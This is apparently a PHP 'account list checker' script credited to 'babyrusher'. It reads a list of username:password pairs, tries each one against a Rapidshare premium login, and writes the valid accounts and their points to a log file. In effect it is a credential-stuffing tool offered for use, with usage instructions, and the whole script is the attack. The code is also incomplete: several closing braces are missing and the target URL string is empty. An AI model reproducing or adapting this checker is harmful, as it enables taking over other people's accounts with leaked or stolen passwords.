copyright by babyrusher


   print "\n===========================================\n";

   print "== account list checker  ==\n";

   print "==  help:                                ==\n";

   print "==  php checker.php pw:userfile savefile ==\n";

   print "==  example:                             ==\n";

   print "==  php checker.php list.txt log.txt     ==\n";

   print "===========================================\n";

   print "==        copyright by babyrusher        ==\n";

   print "===========================================\n\n";


   // Curl function that connects to RS

   function curl_file_get_contents($url) {

      $ch = curl_init();


      curl_setopt($ch,CURLOPT_URL,$url); // the url of the site

      curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0); //needed for ssl (httpS://)

      $ret = curl_exec($ch);





   $file = $argv[1]; // Argument for the list with the users

   $log = $argv[2]; // Argument for the list where the vaild accounts logged


   if($file == "" || $log == ""){ // check the two arguments

      print "* Please enter an userfile file and an savefile";




   $fp = fopen ($file, "r"); // opens the userlist

   $zeilen=count(file($file)); // counts the lines in the userfile


   for ($i="0";$i<$zeilen;$i++){ // loop

      $line = trim(fgets ($fp,100)); //trim and get the content of the line

      preg_match('%(.*):(.*)%', $line, $user); // regulary expression which saves the user and the password in the $user array


      $url = "".urlencode($user[1])."&password=".urlencode($user[2]); //the Rapidshare url

      $content = curl_file_get_contents($url); // calls the function and copy the source of $url


      if( preg_match('%Your Premium-Account is valid until%', $content) ){ // checks if the account is valid

         preg_match('%You have collected (.*)%', $content, $points); // regulary expression that find the points

         print("Valid !!! Points - USER: $user[1] PW: $user[2] ".$points[1]."\n"); // print the valid account

         $datei = fopen($log,"a+"); // opens the log file

         fwrite($datei, $user[1].":".$user[2]." - " .$points[1]. " Points\n",150); // write the valid account in the logfile

         fclose($datei); // close the log file




      else{ // if the account is invalid

         print("Invalid !!! USER: $user[1] PW: $user[2] :\n");  // print the invalid account





   fclose ($fp); // close the userfile


   // greetz

   // (c) babyrusher
